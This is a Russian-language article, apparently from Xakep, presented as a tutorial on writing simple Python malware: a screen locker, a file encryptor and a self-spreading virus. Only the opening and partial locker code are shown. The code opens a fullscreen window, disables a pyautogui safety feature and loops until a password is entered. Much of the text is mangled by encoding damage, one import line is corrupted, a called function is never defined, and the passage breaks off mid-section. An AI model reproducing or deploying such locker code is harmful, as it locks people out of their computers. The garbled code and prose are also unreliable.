Категория > Новости > Ядовитый питон. Пишем на Python простейшую малварь: локер, шифровальщик и вирус - «Новости»

Ядовитый питон. Пишем на Python простейшую малварь: локер, шифровальщик и вирус - «Новости»

22-05-2020, 16:02. Автор: Baldwin

Почему кому-то может прийти в голову писать малварь на Python? Мы сделаем это, чтобы изучить общие принципы вредоносостроения, а заодно ты попрактикуешься в использовании этого языка и сможешь применять полученные знания в других целях. К тому же малварь на Python таки попадается в дикой природе, и далеко не все антивирусы обращают на нее внимание.

Чаще всего Python применяют для создания бэкдоров в софте, чтобы загружать и исполнять любой код на зараженной машине. Так, в 2017 году сотрудники компании Dr.Web обнаружили Python.BackDoor.33, а 8 мая 2019 года был замечен Mac.BackDoor.Siggen.20. Другой троян — RAT Python крал пользовательские данные с зараженных устройств и использовал Telegram в качестве канала передачи данных.

Мы же создадим три демонстрационные программы: локер, который будет блокировать доступ к компьютеру, пока пользователь не введет правильный пароль, шифровальщик, который будет обходить директории и шифровать все лежащие в них файлы, а также вирус, который будет распространять свой код, заражая другие программы на Python.

Ядовитый питон. Пишем на Python простейшую малварь: локер, шифровальщик и вирус - «Новости»

INFO

Тема удаленного администрирования зараженных машин осталась за рамками этой статьи, однако ты можешь почерпнуть основу для кода со всеми объяснениями в статье «Reverse shell на Python».

Несмотря на то что наши творения не претендуют на сколько-нибудь высокий технический уровень, они в определенных условиях могут быть опасными. Поэтому предупреждаю, что за нарушение работы чужих компьютеров и уничтожение информации может последовать строгое наказание. Давай сразу договоримся: запускать все, что мы здесь описываем, ты будешь только на своей машине, да и то осторожно — чтобы случайно не зашифровать себе весь диск.

WARNING

Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный материалами данной статьи.

Настройка среды

Итак, первым делом нам, конечно, понадобится сам Python, причем третьей версии. Не буду детально расписывать, как его устанавливать, и сразу отправлю тебя скачивать бесплатную книгу «Укус питона» (PDF). В ней ты найдешь ответ на этот и многие другие вопросы, связанные с Python.

Дополнительно установим несколько модулей, которые будем использовать:

pip install pyAesCrypt
pip install pyautogui
pip install tkinter

На этом с подготовительным этапом покончено, можно приступать к написанию кода.

Локер

Идея — создаем окно на полный экран и не даем пользователю закрыть его.

Импорт библиотек:

import pyautogui
from tkinter import Tk, Entry, Label
from pyautogu СЃРѕi import click, moveTo
from time import sleep

Теперь возьмемся за основную часть программы.

# РЎРѕР·РґР°РµРј РѕРєРЅРѕ
root = Tk()
# Р’С‹СЂСѓР±Р°РµРј Р·Р°С‰РёС‚Сѓ Р»РµРІРѕРіРѕ РІРµСЂС…РЅРµРіРѕ СѓРіР»Р° СЌРєСЂР°РЅР°
pyautogui.FAILSAFE = False
# РџРѕР»СѓС‡Р°РµРј С€РёСЂРёРЅСѓ Рё РІС‹СЃРѕС‚Сѓ РѕРєРЅР°
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
# Р—Р°РґР°РµРј Р·Р°РіРѕР»РѕРІРѕРє РѕРєРЅР°
root.title('From "Xakep" with love')
# РћС‚РєСЂС‹РІР°РµРј РѕРєРЅРѕ РЅР° РІРµСЃСЊ СЌРєСЂР°РЅ
root.attributes("-fullscreen", True)
# РЎРѕР·РґР°РµРј РїРѕР»Рµ РґР»СЏ РІРІРѕРґР°, Р·Р°РґР°РµРј РµРіРѕ СЂР°Р·РјРµСЂС‹ Рё СЂР°СЃРїРѕР»РѕР¶РµРЅРёРµ
entry = Entry(root, font=1)
entry.place(width=150, height=50, x=width/2-75, y=height/2-25)
# РЎРѕР·РґР°РµРј С‚РµРєСЃС‚РѕРІС‹Рµ РїРѕРґРїРёСЃРё Рё Р·Р°РґР°РµРј РёС… СЂР°СЃРїРѕР»РѕР¶РµРЅРёРµ
label0 = Label(root, text="в•љ(вЂўвЊ‚вЂў)в•ќ Locker by Xakep (в•ЇВ°в–ЎВ°пј‰в•Їпёµ в”»в”Ѓв”»", font=1)
label0.grid(row=0, column=0)
label1 = Label(root, text="РџРёС€Рё РїР°СЂРѕР»СЊ Рё Р¶РјРё Ctrl + C", font='Arial 20')
label1.place(x=width/2-75-130, y=height/2-25-100)
# Р’РєР»СЋС‡Р°РµРј РїРѕСЃС‚РѕСЏРЅРЅРѕРµ РѕР±РЅРѕРІР»РµРЅРёРµ РѕРєРЅР° Рё РґРµР»Р°РµРј РїР°СѓР·Сѓ
root.update()
sleep(0.2)
# РљР»РёРєР°РµРј РІ С†РµРЅС‚СЂ РѕРєРЅР°
click(width/2, height/2)
# РѕР±РЅСѓР»СЏРµРј РєР»СЋС‡
k = False
# РўРµРїРµСЂСЊ РЅРµРїСЂРµСЂС‹РІРЅРѕ РїСЂРѕРІРµСЂСЏРµРј, РЅРµ РІРІРµРґРµРЅ Р»Рё РІРµСЂРЅС‹Р№ РєР»СЋС‡
# Р•СЃР»Рё РІРІРµРґРµРЅ, РІС‹Р·С‹РІР°РµРј С„СѓРЅРєС†РёСЋ С…СѓР»РёРіР°РЅСЃС‚РІР°
while not k:
    on_closing()

Здесь pyautogui.FAILSAFE = False вЂ” Р·Р°С‰РёС‚Р°, РєРѕС‚РѕСЂР°СЏ Р°РєС‚РёРІРёСЂСѓРµС‚СЃСЏ РїСЂРё РїРµСЂРµРјРµС‰РµРЅРёРё РєСѓСЂСЃРѕСЂР° РІ РІРµСЂС…РЅРёР№ Р»РµРІС‹Р№ СѓРіРѕР» СЌРєСЂР°РЅР°. РџСЂРё РµРµ СЃСЂР°Р±Р°С‚С‹РІР°РЅРёРё РїСЂРѕРіСЂР°РјРјР° Р·Р°РєСЂС‹РІР°РµС‚СЃСЏ. РќР°Рј СЌС‚Рѕ РЅРµ РЅР°РґРѕ, РїРѕСЌС‚РѕРјСѓ РІС‹СЂСѓР±Р°РµРј СЌС‚Сѓ С„СѓРЅРєС†РёСЋ.

Р§С‚РѕР±С‹ РЅР°С€ Р»РѕРєРµСЂ СЂР°Р±РѕС‚Р°Р» РЅР° Р»СЋР±РѕРј РјРѕРЅРёС‚РѕСЂРµ СЃ Р»СЋР±С‹Рј СЂР°Р·СЂРµС€РµРЅРёРµРј, СЃС‡РёС‚С‹РІР°РµРј С€РёСЂРёРЅСѓ Рё РІС‹СЃРѕС‚Сѓ СЌРєСЂР°РЅР° Рё РїРѕ РїСЂРѕСЃС‚РѕР№ С„РѕСЂРјСѓР»Рµ РІС‹С‡РёСЃР»СЏРµРј, РєСѓРґР° Р±СѓРґРµС‚ РїРѕРїР°РґР°С‚СЊ РєСѓСЂСЃРѕСЂ, РґРµР»Р°С‚СЊСЃСЏ РєР»РёРє Рё С‚Р°Рє РґР°Р»РµРµ. Р’ РЅР°С€РµРј СЃР»СѓС‡Р°Рµ РєСѓСЂСЃРѕСЂ РїРѕРїР°РґР°РµС‚ РІ С†РµРЅС‚СЂ СЌРєСЂР°РЅР°, С‚Рѕ РµСЃС‚СЊ С€РёСЂРёРЅСѓ Рё РІС‹СЃРѕС‚Сѓ РјС‹ РґРµР»РёРј РЅР° РґРІР°. РџР°СѓР·Сѓ (sleep) добавим для того, чтобы пользователь мог ввести код для отмены.

Сейчас мы не блокировали ввод текста, но можно это сделать, и тогда пользователь никак от нас не избавится. Для этого напишем еще немного кода. Не советую делать это сразу. Сначала давай настроим программу, чтобы она выключалась при вводе пароля. Но код для блокирования клавиатуры и мыши выглядит вот так:

Перейти обратно к новости